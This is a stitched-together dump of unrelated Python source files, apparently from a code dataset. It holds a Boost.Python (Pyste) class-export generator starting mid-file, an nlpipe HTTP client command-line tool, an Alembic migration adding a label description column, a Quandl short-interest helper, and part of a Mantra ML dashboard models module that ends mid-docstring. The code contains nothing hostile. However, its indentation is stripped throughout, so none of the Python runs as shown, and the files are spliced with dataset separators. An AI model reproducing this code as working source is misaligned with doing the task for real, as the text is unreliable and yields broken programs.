Exporter.SetDeclarations(self, declarations)
decl = self.GetDeclaration(self.info.name)
if isinstance(decl, Typedef):
self.class_ = self.GetDeclaration(decl.type.name)
if not self.info.rename:
self.info.rename = decl.name
else:
self.class_ = decl
self.public_members = \
[x for x in self.class_.members if x.visibility == Scope.public]
def Order(self):
'''Return the TOTAL number of bases that this class has, including the
        bases' bases. Do this because base classes must be instantiated
before the derived classes in the module definition.
'''
def BasesCount(classname):
decl = self.GetDeclaration(classname)
bases = [x.name for x in decl.bases]
total = 0
for base in bases:
total += BasesCount(base)
return len(bases) + total
return BasesCount(self.class_.FullName())
def Export(self, codeunit, exported_names):
self.ExportBasics()
self.ExportBases(exported_names)
self.ExportConstructors()
self.ExportVariables()
self.ExportMethods()
self.ExportVirtualMethods()
self.ExportOperators()
self.ExportNestedClasses(exported_names)
self.ExportNestedEnums()
self.Write(codeunit)
def Write(self, codeunit):
indent = self.INDENT
boost_ns = namespaces.python
pyste_ns = namespaces.pyste
code = ''
# begin a scope for this class if needed
nested_codeunits = self.nested_codeunits
needs_scope = self.sections['scope'] or nested_codeunits
if needs_scope:
scope_name = self.ScopeName()
code += indent + boost_ns + 'scope* %s = new %sscope(\n' %\
(scope_name, boost_ns)
# export the template section
template_params = ', '.join(self.sections['template'])
code += indent + boost_ns + 'class_< %s >' % template_params
# export the constructor section
constructor_params = ', '.join(self.sections['constructor'])
code += '(%s)\n' % constructor_params
# export the inside section
in_indent = indent*2
for line in self.sections['inside']:
code += in_indent + line + '\n'
# write the scope section and end it
if not needs_scope:
code += indent + ';\n'
else:
code += indent + ');\n'
for line in self.sections['scope']:
code += indent + line + '\n'
# write the contents of the nested classes
for nested_unit in nested_codeunits:
code += '\n' + nested_unit.Section('module')
# close the scope
code += indent + 'delete %s;\n' % scope_name
# write the code to the module section in the codeunit
codeunit.Write('module', code + '\n')
# write the declarations to the codeunit
declarations = '\n'.join(self.sections['declaration'])
for nested_unit in nested_codeunits:
declarations += nested_unit.Section('declaration')
if declarations:
codeunit.Write('declaration', declarations + '\n')
# write the includes to the codeunit
includes = '\n'.join(self.sections['include'])
for nested_unit in nested_codeunits:
includes += nested_unit.Section('include')
if includes:
codeunit.Write('include', includes)
def Add(self, section, item):
'Add the item into the corresponding section'
self.sections[section].append(item)
def ExportBasics(self):
'Export the name of the class and its class_ statement'
self.Add('template', self.class_.FullName())
name = self.info.rename or self.class_.name
self.Add('constructor', '"%s"' % name)
def ExportBases(self, exported_names):
'Expose the bases of the class into the template section'
bases = self.class_.bases
bases_list = []
for base in bases:
if base.visibility == Scope.public and base.name in exported_names:
bases_list.append(base.name)
if bases_list:
code = namespaces.python + 'bases< %s > ' % \
(', '.join(bases_list))
self.Add('template', code)
def ExportConstructors(self):
        '''Exports all the public constructors of the class, plus indicates if the
class is noncopyable.
'''
py_ns = namespaces.python
indent = self.INDENT
def init_code(cons):
            'return the init<>() code for the given constructor'
param_list = [p.FullName() for p in cons.parameters]
min_params_list = param_list[:cons.minArgs]
max_params_list = param_list[cons.minArgs:]
min_params = ', '.join(min_params_list)
max_params = ', '.join(max_params_list)
init = py_ns + 'init< '
init += min_params
if max_params:
if min_params:
init += ', '
init += py_ns + ('optional< %s >' % max_params)
init += ' >()'
return init
constructors = [x for x in self.public_members if isinstance(x, Constructor)]
self.constructors = constructors[:]
# don't export the copy constructor if the class is abstract
if self.class_.abstract:
for cons in constructors:
if cons.IsCopy():
constructors.remove(cons)
break
if not constructors:
# declare no_init
self.Add('constructor', py_ns + 'no_init')
else:
# write the constructor with less parameters to the constructor section
smaller = None
for cons in constructors:
if smaller is None or len(cons.parameters) < len(smaller.parameters):
smaller = cons
assert smaller is not None
self.Add('constructor', init_code(smaller))
constructors.remove(smaller)
# write the rest to the inside section, using def()
for cons in constructors:
code = '.def(%s)' % init_code(cons)
self.Add('inside', code)
# check if the class is copyable
if not self.class_.HasCopyConstructor() or self.class_.abstract:
self.Add('template', namespaces.boost + 'noncopyable')
def ExportVariables(self):
'Export the variables of the class, both static and simple variables'
vars = [x for x in self.public_members if isinstance(x, Variable)]
for var in vars:
if self.info[var.name].exclude:
continue
name = self.info[var.name].rename or var.name
fullname = var.FullName()
if var.static:
code = '%s->attr("%s") = %s;' % (self.ScopeName(), name, fullname)
self.Add('scope', code)
else:
if var.type.const:
def_ = '.def_readonly'
else:
def_ = '.def_readwrite'
code = '%s("%s", &%s)' % (def_, name, fullname)
self.Add('inside', code)
printed_policy_warnings = {}
def CheckPolicy(self, m):
'Warns the user if this method needs a policy'
def IsString(type):
return type.const and type.name == 'char' and isinstance(type, PointerType)
needs_policy = isinstance(m.result, (ReferenceType, PointerType))
if IsString(m.result):
needs_policy = False
has_policy = self.info[m.name].policy is not None
if needs_policy and not has_policy:
warning = '---> Error: Method "%s" needs a policy.' % m.FullName()
if warning not in self.printed_policy_warnings:
print warning
print
self.printed_policy_warnings[warning] = 1
def ExportMethods(self):
'Export all the non-virtual methods of this class'
def OverloadName(m):
'Returns the name of the overloads struct for the given method'
return _ID(m.FullName()) + ('_overloads_%i_%i' % (m.minArgs, m.maxArgs))
declared = {}
def DeclareOverloads(m):
'Declares the macro for the generation of the overloads'
if not m.virtual:
func = m.name
code = 'BOOST_PYTHON_MEMBER_FUNCTION_OVERLOADS(%s, %s, %i, %i)\n'
code = code % (OverloadName(m), func, m.minArgs, m.maxArgs)
if code not in declared:
declared[code] = True
self.Add('declaration', code)
def Pointer(m):
'returns the correct pointer declaration for the method m'
# check if this method has a wrapper set for him
wrapper = self.info[method.name].wrapper
if wrapper:
return '&' + wrapper.FullName()
# return normal pointers to the methods of the class
is_unique = self.class_.IsUnique(m.name)
if is_unique:
return '&' + method.FullName()
else:
return method.PointerDeclaration()
def IsExportable(m):
'Returns true if the given method is exportable by this routine'
ignore = (Constructor, ClassOperator, Destructor)
return isinstance(m, Method) and not isinstance(m, ignore) and not m.virtual
methods = [x for x in self.public_members if IsExportable(x)]
for method in methods:
if self.info[method.name].exclude:
continue # skip this method
name = self.info[method.name].rename or method.name
# warn the user if this method needs a policy and doesn't have one
self.CheckPolicy(method)
# check for policies
policy = self.info[method.name].policy or ''
if policy:
policy = ', %s%s()' % (namespaces.python, policy.Code())
# check for overloads
overload = ''
if method.minArgs != method.maxArgs:
# add the overloads for this method
overload_name = OverloadName(method)
DeclareOverloads(method)
overload = ', %s%s()' % (namespaces.pyste, overload_name)
# build the .def string to export the method
pointer = Pointer(method)
code = '.def("%s", %s' % (name, pointer)
code += policy
code += overload
code += ')'
self.Add('inside', code)
# static method
if method.static:
code = '.staticmethod("%s")' % name
self.Add('inside', code)
# add wrapper code if this method has one
wrapper = self.info[method.name].wrapper
if wrapper and wrapper.code:
self.Add('declaration', wrapper.code)
def ExportVirtualMethods(self):
# check if this class has any virtual methods
has_virtual_methods = False
for member in self.class_.members:
if type(member) == Method and member.virtual:
has_virtual_methods = True
break
if has_virtual_methods:
generator = _VirtualWrapperGenerator(self.class_, self.info)
self.Add('template', generator.FullName())
for definition in generator.GenerateDefinitions():
self.Add('inside', definition)
self.Add('declaration', generator.GenerateVirtualWrapper(self.INDENT))
# operators natively supported by boost
BOOST_SUPPORTED_OPERATORS = '+ - * / % ^ & ! ~ | < > == != <= >= << >> && || += -='\
'*= /= %= ^= &= |= <<= >>='.split()
# create a map for faster lookup
BOOST_SUPPORTED_OPERATORS = dict(zip(BOOST_SUPPORTED_OPERATORS, range(len(BOOST_SUPPORTED_OPERATORS))))
# a dict of operators that are not directly supported by boost, but can be exposed
# simply as a function with a special signature
BOOST_RENAME_OPERATORS = {
'()' : '__call__',
}
# converters which has a special name in python
SPECIAL_CONVERTERS = {
'double' : '__float__',
'float' : '__float__',
'int' : '__int__',
'long' : '__long__',
}
def ExportOperators(self):
'Export all member operators and free operators related to this class'
def GetFreeOperators():
'Get all the free (global) operators related to this class'
operators = []
for decl in self.declarations:
if isinstance(decl, Operator):
# check if one of the params is this class
for param in decl.parameters:
if param.name == self.class_.FullName():
operators.append(decl)
break
return operators
def GetOperand(param):
'Returns the operand of this parameter (either "self", or "other<type>")'
if param.name == self.class_.FullName():
return namespaces.python + 'self'
else:
return namespaces.python + ('other< %s >()' % param.name)
def HandleSpecialOperator(operator):
            # gather information about the operator and its parameters
result_name = operator.result.name
param1_name = ''
if operator.parameters:
param1_name = operator.parameters[0].name
# check for str
ostream = 'basic_ostream'
is_str = result_name.find(ostream) != -1 and param1_name.find(ostream) != -1
if is_str:
namespace = namespaces.python + 'self_ns::'
self_ = namespaces.python + 'self'
return '.def(%sstr(%s))' % (namespace, self_)
# is not a special operator
return None
frees = GetFreeOperators()
members = [x for x in self.public_members if type(x) == ClassOperator]
all_operators = frees + members
operators = [x for x in all_operators if not self.info['operator'][x.name].exclude]
for operator in operators:
            # gather information about the operator, for use later
wrapper = self.info['operator'][operator.name].wrapper
if wrapper:
pointer = '&' + wrapper.FullName()
if wrapper.code:
self.Add('declaration', wrapper.code)
elif isinstance(operator, ClassOperator) and self.class_.IsUnique(operator.name):
pointer = '&' + operator.FullName()
else:
pointer = operator.PointerDeclaration()
rename = self.info['operator'][operator.name].rename
# check if this operator will be exported as a method
export_as_method = wrapper or rename or operator.name in self.BOOST_RENAME_OPERATORS
# check if this operator has a special representation in boost
special_code = HandleSpecialOperator(operator)
has_special_representation = special_code is not None
if export_as_method:
# export this operator as a normal method, renaming or using the given wrapper
if not rename:
if wrapper:
rename = wrapper.name
else:
rename = self.BOOST_RENAME_OPERATORS[operator.name]
policy = ''
policy_obj = self.info['operator'][operator.name].policy
if policy_obj:
policy = ', %s()' % policy_obj.Code()
self.Add('inside', '.def("%s", %s%s)' % (rename, pointer, policy))
elif has_special_representation:
self.Add('inside', special_code)
elif operator.name in self.BOOST_SUPPORTED_OPERATORS:
# export this operator using boost's facilities
op = operator
is_unary = isinstance(op, Operator) and len(op.parameters) == 1 or\
isinstance(op, ClassOperator) and len(op.parameters) == 0
if is_unary:
self.Add('inside', '.def( %s%sself )' % \
(operator.name, namespaces.python))
else:
# binary operator
if len(operator.parameters) == 2:
left_operand = GetOperand(operator.parameters[0])
right_operand = GetOperand(operator.parameters[1])
else:
left_operand = namespaces.python + 'self'
right_operand = GetOperand(operator.parameters[0])
self.Add('inside', '.def( %s %s %s )' % \
(left_operand, operator.name, right_operand))
# export the converters.
# export them as simple functions with a pre-determined name
converters = [x for x in self.public_members if type(x) == ConverterOperator]
def ConverterMethodName(converter):
result_fullname = converter.result.name
if result_fullname in self.SPECIAL_CONVERTERS:
return self.SPECIAL_CONVERTERS[result_fullname]
else:
# extract the last name from the full name
result_name = _ID(result_fullname.split('::')[-1])
return 'to_' + result_name
for converter in converters:
info = self.info['operator'][converter.result.name]
# check if this operator should be excluded
if info.exclude:
continue
special_code = HandleSpecialOperator(converter)
if info.rename or not special_code:
# export as method
name = info.rename or ConverterMethodName(converter)
if self.class_.IsUnique(converter.name):
pointer = '&' + converter.FullName()
else:
pointer = converter.PointerDeclaration()
policy_code = ''
if info.policy:
policy_code = ', %s()' % info.policy.Code()
self.Add('inside', '.def("%s", %s%s)' % (name, pointer, policy_code))
elif special_code:
self.Add('inside', special_code)
def ExportNestedClasses(self, exported_names):
nested_classes = [x for x in self.public_members if isinstance(x, NestedClass)]
for nested_class in nested_classes:
nested_info = self.info[nested_class.name]
nested_info.include = self.info.include
nested_info.name = nested_class.FullName()
exporter = ClassExporter(nested_info)
exporter.SetDeclarations(self.declarations + [nested_class])
codeunit = CodeUnit(None)
exporter.Export(codeunit, exported_names)
self.nested_codeunits.append(codeunit)
def ExportNestedEnums(self):
nested_enums = [x for x in self.public_members if isinstance(x, ClassEnumeration)]
for enum in nested_enums:
enum_info = self.info[enum.name]
enum_info.include = self.info.include
enum_info.name = enum.FullName()
exporter = EnumExporter(enum_info)
exporter.SetDeclarations(self.declarations + [enum])
codeunit = CodeUnit(None)
exporter.Export(codeunit, None)
self.nested_codeunits.append(codeunit)
def _ID(name):
'Returns the name as a valid identifier'
for invalidchar in ('::', '<', '>', ' ', ','):
name = name.replace(invalidchar, '_')
# avoid duplications of '_' chars
names = [x for x in name.split('_') if x]
return '_'.join(names)
#==============================================================================
# Virtual Wrapper utils
#==============================================================================
def _ParamsInfo(m, count=None):
if count is None:
count = len(m.parameters)
param_names = ['p%i' % i for i in range(count)]
param_types = [x.FullName() for x in m.parameters[:count]]
params = ['%s %s' % (t, n) for t, n in zip(param_types, param_names)]
#for i, p in enumerate(m.parameters[:count]):
# if p.default is not None:
# #params[i] += '=%s' % p.default
# params[i] += '=%s' % (p.name + '()')
params = ', '.join(params)
return params, param_names, param_types
class _VirtualWrapperGenerator(object):
'Generates code to export the virtual methods of the given class'
def __init__(self, class_, info):
self.class_ = class_
self.info = info
self.wrapper_name = _ID(class_.FullName()) + '_Wrapper'
def DefaultImplementationNames(self, method):
'''Returns a list of default implementations for this method, one for each
number of default arguments. Always returns at least one name, and return from
the one with most arguments to the one with the least.
'''
base_name = 'default_' + method.name
minArgs = method.minArgs
maxArgs = method.maxArgs
if minArgs == maxArgs:
return [base_name]
else:
return [base_name + ('_%i' % i) for i in range(minArgs, maxArgs+1)]
def Declaration(self, method, indent):
'''Returns a string with the declarations of the virtual wrapper and
its default implementations. This string must be put inside the Wrapper
body.
'''
pyste = namespaces.pyste
python = namespaces.python
rename = self.info[method.name].rename or method.name
result = method.result.FullName()
return_str = 'return '
if result == 'void':
return_str = ''
params, param_names, param_types = _ParamsInfo(method)
constantness = ''
if method.const:
constantness = ' const'
# call_method callback
decl = indent + '%s %s(%s)%s {\n' % (result, method.name, params, constantness)
param_names_str = ', '.join(param_names)
if param_names_str:
param_names_str = ', ' + param_names_str
decl += indent*2 + '%s%scall_method< %s >(self, "%s"%s);\n' %\
(return_str, python, result, rename, param_names_str)
decl += indent + '}\n'
# default implementations (with overloading)
# only for classes that are not abstract, and public methods
if not method.abstract and method.visibility == Scope.public:
minArgs = method.minArgs
maxArgs = method.maxArgs
impl_names = self.DefaultImplementationNames(method)
for impl_name, argNum in zip(impl_names, range(minArgs, maxArgs+1)):
params, param_names, param_types = _ParamsInfo(method, argNum)
decl += '\n'
decl += indent + '%s %s(%s)%s {\n' % (result, impl_name, params, constantness)
decl += indent*2 + '%s%s::%s(%s);\n' % \
(return_str, self.class_.FullName(), method.name, ', '.join(param_names))
decl += indent + '}\n'
return decl
def MethodDefinition(self, method):
'''Returns a list of lines, which should be put inside the class_
statement to export this method.'''
        # don't define abstract methods
pyste = namespaces.pyste
rename = self.info[method.name].rename or method.name
default_names = self.DefaultImplementationNames(method)
class_name = self.class_.FullName()
wrapper_name = pyste + self.wrapper_name
result = method.result.FullName()
is_method_unique = self.class_.IsUnique(method.name)
constantness = ''
if method.const:
constantness = ' const'
# create a list of default-impl pointers
minArgs = method.minArgs
maxArgs = method.maxArgs
if is_method_unique:
default_pointers = ['&%s::%s' % (wrapper_name, x) for x in default_names]
else:
default_pointers = []
for impl_name, argNum in zip(default_names, range(minArgs, maxArgs+1)):
param_list = [x.FullName() for x in method.parameters[:argNum]]
params = ', '.join(param_list)
signature = '%s (%s::*)(%s)%s' % (result, wrapper_name, params, constantness)
default_pointer = '(%s)%s::%s' % (signature, wrapper_name, impl_name)
default_pointers.append(default_pointer)
# get the pointer of the method
if is_method_unique:
pointer = '&' + method.FullName()
else:
pointer = method.PointerDeclaration()
# generate the defs
definitions = []
# basic def
definitions.append('.def("%s", %s, %s)' % (rename, pointer, default_pointers[-1]))
for default_pointer in default_pointers[:-1]:
definitions.append('.def("%s", %s)' % (rename, default_pointer))
return definitions
def FullName(self):
return namespaces.pyste + self.wrapper_name
def VirtualMethods(self):
def IsVirtual(m):
return type(m) == Method and m.virtual
return [m for m in self.class_.members if IsVirtual(m)]
def Constructors(self):
def IsValid(m):
return isinstance(m, Constructor) and m.visibility == Scope.public
return [m for m in self.class_.members if IsValid(m)]
def GenerateDefinitions(self):
defs = []
for method in self.VirtualMethods():
exclude = self.info[method.name].exclude
# generate definitions only for public methods and non-abstract methods
if method.visibility == Scope.public and not method.abstract and not exclude:
defs.extend(self.MethodDefinition(method))
return defs
def GenerateVirtualWrapper(self, indent):
'Return the wrapper for this class'
# generate the class code
class_name = self.class_.FullName()
code = 'struct %s: %s\n' % (self.wrapper_name, class_name)
code += '{\n'
# generate constructors (with the overloads for each one)
for cons in self.Constructors(): # only public constructors
minArgs = cons.minArgs
maxArgs = cons.maxArgs
# from the min number of arguments to the max number, generate
# all version of the given constructor
cons_code = ''
for argNum in range(minArgs, maxArgs+1):
params, param_names, param_types = _ParamsInfo(cons, argNum)
if params:
params = ', ' + params
cons_code += indent + '%s(PyObject* self_%s):\n' % \
(self.wrapper_name, params)
cons_code += indent*2 + '%s(%s), self(self_) {}\n\n' % \
(class_name, ', '.join(param_names))
code += cons_code
# generate the body
body = []
for method in self.VirtualMethods():
if not self.info[method.name].exclude:
body.append(self.Declaration(method, indent))
body = '\n'.join(body)
code += body + '\n'
# add the self member
code += indent + 'PyObject* self;\n'
code += '};\n'
return code
| StarcoderdataPython |
3382439 | <reponame>farzamfan/NLP-Pipeline<filename>nlpipe/Clients/client.py
import logging
import os
import argparse
import sys
from nlpipe.Clients.HTTPClient import HTTPClient
def get_client(server_name, token=None):
"""
Returns a client (for now only HTTP client)
:param server_name: address of the server (URL)
:param token: authentication token
:return: initialized HTTP client
"""
if server_name.startswith("http:") or server_name.startswith("https:"): # if the server is remote
logging.getLogger('requests').setLevel(logging.WARNING) # logging
if not token:
token = os.environ.get('NLPIPE_TOKEN', None) # authentication token
logging.debug("Connecting to REST server at {server_name} using token={}".format(bool(token), **locals()))
return HTTPClient(server_name, token=token)
if __name__ == '__main__': # if run as a module
parser = argparse.ArgumentParser()
parser.add_argument("server", help="Server hostname or directory location")
parser.add_argument("tool", help="Tool name") # NLP processing tool
parser.add_argument("--verbose", "-v", help="Verbose (debug) output", action="store_true", default=False)
parser.add_argument("--token", "-t", help="Provide auth token"
"(default reads ./.nlpipe_token or NLPIPE_TOKEN")
action_parser = parser.add_subparsers(dest='action', title='Actions') # parser for actions
action_parser.required = True
actions = {name: action_parser.add_parser(name) # add possible actions
for name in ('doc_status', 'result', 'check', 'process', 'process_inline',
'bulk_status', 'bulk_result', 'store_result', 'store_error')}
for action in 'doc_status', 'result', 'store_result', 'store_error':
actions[action].add_argument('doc_id', help="Document ID")
for action in 'bulk_status', 'bulk_result':
actions[action].add_argument('ids', nargs="+", help="Document IDs")
for action in 'result', 'process_inline', 'bulk_result':
actions[action].add_argument("--return_format", help="Optional output format to retrieve") # return format
for action in 'process', 'process_inline':
actions[action].add_argument('doc', help="Document to process (use - to read from stdin")
actions[action].add_argument('doc_id', nargs="?", help="Optional explicit document ID")
for action in ('store_result', 'store_error'):
actions[action].add_argument('result', help="Document to store (use - to read from stdin")
args = vars(parser.parse_args()) # turn to dict so we can pop and pass the rest as kargs
logging.basicConfig(level=logging.DEBUG if args.pop('verbose', False) else logging.INFO,
format='[%(asctime)s %(name)-12s %(levelname)-5s] %(message)s')
client = get_client(args.pop('server'), token=args.pop('token', None)) # add HTTP client
for doc_arg in ('doc', 'result'):
if args.get(doc_arg) == '-':
args[doc_arg] = sys.stdin.read()
action = args.pop('action') # requested action
args = {k: v for (k, v) in args.items() if v}
result = getattr(client, action)(**args) # run the action via the HTTP client
if action == "get_task": # in case a task is given
doc_id, doc = result
if doc_id is not None:
print(doc_id, file=sys.stderr)
print(doc)
elif action in ("store_result", "store_error"):
pass
else:
if result is not None:
print(result)
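
# Hypothetical usage sketches (server URL, tool name and document text are
# invented; the exact HTTPClient method signature is an assumption based on how
# the argparse actions above are dispatched with getattr(client, action)):
#
# As a library:
#   client = get_client("http://localhost:5001")
#   client.process(tool="test_upper", doc="some text to process")
#
# From the command line:
#   python client.py http://localhost:5001 test_upper process "some text"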
| StarcoderdataPython |
1667214 | <reponame>muctadir/labeling-machine<filename>webapp/migrations/versions/f2321be6f3e5_description_for_each_label.py
"""description for each label
Revision ID: f2321be6f3e5
Revises: <PASSWORD>
Create Date: 2022-02-17 19:17:09.417982
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'f2321be6f3e5'
down_revision = '<PASSWORD>'
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
with op.batch_alter_table("Label") as batch_op:
batch_op.add_column(sa.Column('label_description', sa.Text(), nullable=True))
batch_op.drop_column('remark')
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
with op.batch_alter_table("Label") as batch_op:
batch_op.add_column(sa.Column('remark', sa.TEXT(), nullable=True))
batch_op.drop_column('label_description')
# ### end Alembic commands ###
| StarcoderdataPython |
115457 | """ Quandl Model """
__docformat__ = "numpy"
import logging
import pandas as pd
import quandl
from gamestonk_terminal import config_terminal as cfg
from gamestonk_terminal.decorators import log_start_end
logger = logging.getLogger(__name__)
@log_start_end(log=logger)
def get_short_interest(ticker: str, nyse: bool) -> pd.DataFrame:
"""Plots the short interest of a stock. This corresponds to the
number of shares that have been sold short but have not yet been
covered or closed out. Either NASDAQ or NYSE [Source: Quandl]
Parameters
----------
ticker : str
ticker to get short interest from
nyse : bool
data from NYSE if true, otherwise NASDAQ
Returns
----------
pd.DataFrame
short interest volume data
"""
quandl.ApiConfig.api_key = cfg.API_KEY_QUANDL
if nyse:
return quandl.get(f"FINRA/FNYX_{ticker}")
return quandl.get(f"FINRA/FNSQ_{ticker}")
| StarcoderdataPython |
3294115 | <reponame>RJT1990/mantra<filename>mantraml/ui/core/models.py
import boto3
from collections import Counter
import datetime
import os
import shutil
import yaml
from django.db import models
from .consts import MANTRA_DEVELOPMENT_TAG_NAME
from .mantra import Mantra
from .forms import StartInstanceForm, StopInstanceForm, TerminateInstanceForm
class Cloud:
@classmethod
def change_instance_state(cls, ec2_resource, POST):
"""
This method changes the state of an instance based on the request of an instance form view.
Parameters
------------
ec2_resource - boto3.resource('ec2') instance
The EC2 connection
POST - request.POST object
Containing the form information
"""
if 'stop_instance_id' in POST.dict():
posted_form = StopInstanceForm(POST)
if posted_form.is_valid():
instance_id = posted_form.cleaned_data['stop_instance_id']
ec2_resource.instances.filter(InstanceIds=[instance_id]).stop()
elif 'start_instance_id' in POST.dict():
posted_form = StartInstanceForm(POST)
if posted_form.is_valid():
instance_id = posted_form.cleaned_data['start_instance_id']
ec2_resource.instances.filter(InstanceIds=[instance_id]).start()
else:
posted_form = TerminateInstanceForm(POST)
if posted_form.is_valid():
instance_id = posted_form.cleaned_data['terminate_instance_id']
ec2_resource.instances.filter(InstanceIds=[instance_id]).terminate()
@classmethod
def get_instance_metadata(cls, instances, no_dev=False):
"""
This method obtains instance metadata from a list of instances
Parameters
------------
instances - ec2.instances.filter object
EC2 instance filter
no_dev - bool
If True, excludes development instances.
Returns
------------
list of dicts - list of instance metadata
"""
instance_data = []
for instance in instances:
instance_dict = {}
if instance.tags:
instance_dict['name'] = instance.tags[0]['Value']
else:
instance_dict['name'] = ''
instance_dict['type'] = instance.instance_type
instance_dict['id'] = instance.id
instance_dict['tags'] = []
instance_dict['state'] = instance.state['Name']
instance_dict['launch_time'] = instance.launch_time
if no_dev:
if instance_dict['name'] != MANTRA_DEVELOPMENT_TAG_NAME:
instance_data.append(instance_dict)
else:
if instance_dict['name'] == MANTRA_DEVELOPMENT_TAG_NAME:
instance_dict['tags'] += ['development']
instance_data.append(instance_dict)
return instance_data
class Trial:
column_names = ['start_timestamp', 'folder_name', 'trial_hash', 'trial_group_hash', 'model_name', 'model_hash', 'data_name', 'data_hash', 'task_name', 'task_hash']
@classmethod
def get_trial_contents(cls, settings):
"""
This method opens the TRIALS metadata file in the .mantra folder and obtains each row of trial metadata
Parameters
------------
settings - django.settings file
Containing information like the MANTRA_PROJECT_ROOT constant
Returns
------------
list - list of trials each being a list of metadata (str format)
"""
trial_information = open("%s/.mantra/TRIALS" % settings.MANTRA_PROJECT_ROOT, 'r').read()
return [line.split(" ") for line in trial_information.split("\n") if line]
@classmethod
def get_trial_contents_as_dicts(cls, settings):
"""
This method opens the TRIALS metadata file in the .mantra folder and obtains each row of trial metadata.
It then converts this data into a list of dictionaries, where the keys come from Trial.column_names
Parameters
------------
settings - django.settings file
Containing information like the MANTRA_PROJECT_ROOT constant
Returns
------------
list of dicts - each dictionary containing keys (cls.column_names) and values (from the file)
"""
trial_contents = cls.get_trial_contents(settings=settings)
return [dict(zip(cls.column_names, content)) for content in trial_contents]
@classmethod
def remove_group_hash_from_contents(cls, settings, trial_group_hash):
"""
This method takes a trial contents object - a list of metadata - and removes rows where the group trial hash == trial_group_hash
Parameters
------------
settings - django.settings file
Containing information like the MANTRA_PROJECT_ROOT constant
group_trial_hash - str
The hash of a group trial
"""
trial_contents = cls.get_trial_contents(settings=settings)
new_contents = [trial for trial in trial_contents if not trial[3] == trial_group_hash]
trial_folder_names = [trial[1] for trial in trial_contents if trial[3] == trial_group_hash]
new_information = '\n'.join([" ".join(content) for content in new_contents]) + '\n'
for trial_folder in trial_folder_names:
try:
shutil.rmtree('%s/%s/%s' % (settings.MANTRA_PROJECT_ROOT, 'trials', trial_folder)) # delete the trial folder
except FileNotFoundError:
continue # if it's not there, it's already deleted, so we can proceed to try to solely remove from TRIALS file
with open("%s/.mantra/TRIALS" % settings.MANTRA_PROJECT_ROOT, "w") as trial_file:
trial_file.write(new_information)
@classmethod
def get_trial_group_members(cls, settings, model_filter=None, data_filter=None):
"""
This method takes a trial contents object - a list of metadata - and removes rows where the group trial hash == trial_group_hash
Parameters
------------
settings - django.settings file
Containing information like the MANTRA_PROJECT_ROOT constant
model_filter - None or str
If str, will filter the trials so that the trial['model_name'] == model_filter
data_filter - None or str
If str, will filter the trials so that the trial['data_name'] == data_filter
Returns
------------
dict - key is a trial group hash, value is a list of trials (dict metadata) that correspond to that trial group hash
list - of trials
"""
trials = cls.get_trial_contents_as_dicts(settings=settings)
if model_filter:
trials = [trial for trial in trials if trial['model_name'] == model_filter]
elif data_filter:
trials = [trial for trial in trials if trial['data_name'] == data_filter]
trial_group_hashs = list(set([model['trial_group_hash'] for model in trials]))
trial_group_dict = {trial_group_hash: [trial for trial in trials if trial['trial_group_hash'] == trial_group_hash] for trial_group_hash in trial_group_hashs}
return trial_group_dict, trials
@classmethod
def get_trial_group_name_dict(cls, settings):
"""
This method retrieves a dictionary with keys as trial group names, and values as string names for these ids. E.g.:
{'ae42j2ff42f2jeduj4': 'Dropout Experiments'}
This allows for trial groups to be named with human names, rather than dehumanising SHA-256 hashes.
Parameters
------------
settings - django.settings file
Containing information like the MANTRA_PROJECT_ROOT constant
Returns
------------
dict - key is a trial group hash, value is a name for the trial group e.g. "Learning Rate Tests"
"""
with open("%s/.mantra/TRIAL_GROUP_NAMES" % settings.MANTRA_PROJECT_ROOT, "r") as trial_group_name_file:
yaml_content = yaml.load(trial_group_name_file)
if not yaml_content:
yaml_content = {}
return yaml_content
@staticmethod
def get_trial_group_name(trial_group_name_dict, trial_group_hash):
"""
Parameters
------------
trial_group_name_dict - dict
The dictionary containing as keys trial group hashes, and as values trial group names, e.g. "Dropout Experiments"
trial_group_hash - str
The string for the trial group hash, e.g. a93idjj4v2ojf42of24cew...
Returns
------------
str - the name of the trial group given the dictionary and the hash entered
"""
try:
return trial_group_name_dict[trial_group_hash]
except KeyError:
return trial_group_hash[:6]
@classmethod
def get_trial_group_metadata(cls, settings, hash, trial_groups):
"""
This method obtains trial group metadata from a list of trial group dictionaries
Parameters
------------
settings - django.settings file
Containing information like the MANTRA_PROJECT_ROOT constant
hash - str
The hash for the trial group
trial_groups - list
List of dicts, where each dict contains metadata on a trial
Returns
------------
dict - containing metadata on the trial group
"""
yaml_content = Trial.get_trial_group_name_dict(settings=settings)
latest_trial_time = datetime.datetime.utcfromtimestamp(int(str(max([trial['start_timestamp'] for trial in trial_groups]))))
trial_group_metadata = {}
if not trial_groups:
return trial_group_metadata
example_trial = trial_groups[0]
for metadata_name in ['trial_group_hash', 'folder_name', 'model_name', 'model_hash', 'data_name', 'task_name', 'task_hash', 'data_hash']:
trial_group_metadata[metadata_name] = example_trial[metadata_name]
try:
dataset_metadata = Mantra.find_dataset_metadata(example_trial['data_name'])
except ImportError:
return {}
task_metadata = Mantra.find_task_metadata(example_trial['task_name'])
trial_group_metadata['time'] = latest_trial_time
trial_group_metadata['timestamp'] = latest_trial_time.timestamp()
trial_group_metadata['model_metadata'] = Mantra.find_model_metadata(trial_group_metadata['model_name'])
trial_group_metadata['trial_group_name'] = Trial.get_trial_group_name(yaml_content, example_trial['trial_group_hash'])
trial_group_metadata['latest_media'] = Mantra.find_latest_trial_media(trial_group_metadata['folder_name'])
trial_group_metadata['data_full_name'] = dataset_metadata['name']
trial_group_metadata['task_full_name'] = task_metadata['name']
trial_group_metadata['data_image'] = dataset_metadata['data_image']
trial_group_metadata['n_trials'] = len(trial_groups)
return trial_group_metadata
@classmethod
def get_all_trial_group_metadata(cls, settings, trial_group_members):
"""
This method obtains trial group metadata from a dictionary containing core trial group metadata
Parameters
------------
settings - django.settings file
Containing information like the MANTRA_PROJECT_ROOT constant
trial_group_members - dict
Keys are trial group hashes; values are list of trial dictionaries corresponding to that trial group
Returns
------------
list of dicts - each containing metadata on the trial group
"""
trial_group_metadata = [cls.get_trial_group_metadata(
settings=settings,
hash=trial_group_hash,
trial_groups=trial_groups) for trial_group_hash, trial_groups in trial_group_members.items()]
return [group for group in trial_group_metadata if group]
class Artefact:
@classmethod
def all(cls, settings, artefacts_folder):
"""
This method obtains a list of all artefacts in the artefact folder provided
Parameters
------------
settings - django.settings file
Containing information like the MANTRA_PROJECT_ROOT constant
artefacts_folder -
Path of the folder where the artefact folders are located
Returns
------------
